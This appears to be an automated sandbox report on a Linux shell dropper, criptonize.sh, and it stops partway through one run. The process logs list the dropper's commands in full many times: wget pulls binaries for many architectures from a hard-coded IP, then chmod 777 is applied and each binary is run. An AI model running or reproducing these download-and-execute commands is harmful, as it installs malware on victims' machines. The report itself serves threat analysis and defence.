Malware Analysis Report

2025-01-23 14:22

Sample ID 240827-3svyxsxdlf
Target criptonize.sh
SHA256 5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
Tags
rootkit antivm
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405

Threat Level: Likely malicious

The file criptonize.sh was found to be: Likely malicious.

Malicious Activity Summary

rootkit antivm

Writes memory of remote process

Loads a kernel module

Checks CPU configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-27 23:47

Signatures

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

29s

Max time network

30s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/bin/rm

[rm -f criptonize.armv6l]

/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/bin/rm

[rm -f criptonize.armv5l]

/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/bin/rm

[rm -f criptonize.armv4eb]

/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/bin/rm

[rm -f criptonize.armv4tl]

/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/bin/rm

[rm -f criptonize.armv4l]

/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/bin/rm

[rm -f criptonize.mips64]

/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/bin/rm

[rm -f criptonize.mips]

/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/bin/rm

[rm -f criptonize.mipsel]

/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/wget

[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
GB 195.181.164.14:443 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu2004-amd64-20240508-en

Max time kernel

27s

Max time network

32s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.m68k /usr/bin/wget N/A
File opened for modification /tmp/criptonize.arc700 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sparc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sh4 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.bsdamd64 /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/usr/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/wget

[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

/usr/bin/chmod

[chmod 777 criptonize.powerpc]

/tmp/criptonize.powerpc

[./criptonize.powerpc powerpc]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/wget

[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]

/usr/bin/chmod

[chmod 777 criptonize.m68k]

/tmp/criptonize.m68k

[./criptonize.m68k m68k]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/wget

[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]

/usr/bin/chmod

[chmod 777 criptonize.sh4]

/tmp/criptonize.sh4

[./criptonize.sh4 sh4]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/wget

[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]

/usr/bin/chmod

[chmod 777 criptonize.sparc]

/tmp/criptonize.sparc

[./criptonize.sparc sparc]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/wget

[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]

/usr/bin/chmod

[chmod 777 criptonize.arc700]

/tmp/criptonize.arc700

[./criptonize.arc700 arc700]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/rm

[rm -f criptonize.bsdamd64]

/usr/bin/wget

[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]

/usr/bin/chmod

[chmod 777 criptonize.bsdamd64]

/tmp/criptonize.bsdamd64

[./criptonize.bsdamd64 bsdamd64]

/usr/bin/rm

[rm -f criptonize.bsdamd64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
RU 212.60.5.174:80 212.60.5.174 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

29s

Max time network

29s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

debian9-mipsel-20240729-en

Max time kernel

30s

Max time network

31s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/bin/rm

[rm -f criptonize.armv6l]

/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/bin/rm

[rm -f criptonize.armv5l]

/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/bin/rm

[rm -f criptonize.armv4eb]

/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/bin/rm

[rm -f criptonize.armv4tl]

/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/bin/rm

[rm -f criptonize.armv4l]

/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/bin/rm

[rm -f criptonize.mips64]

/bin/rm

[rm -f criptonize.mips]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:48

Platform

debian9-armhf-20240611-en

Max time kernel

28s

Max time network

48s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

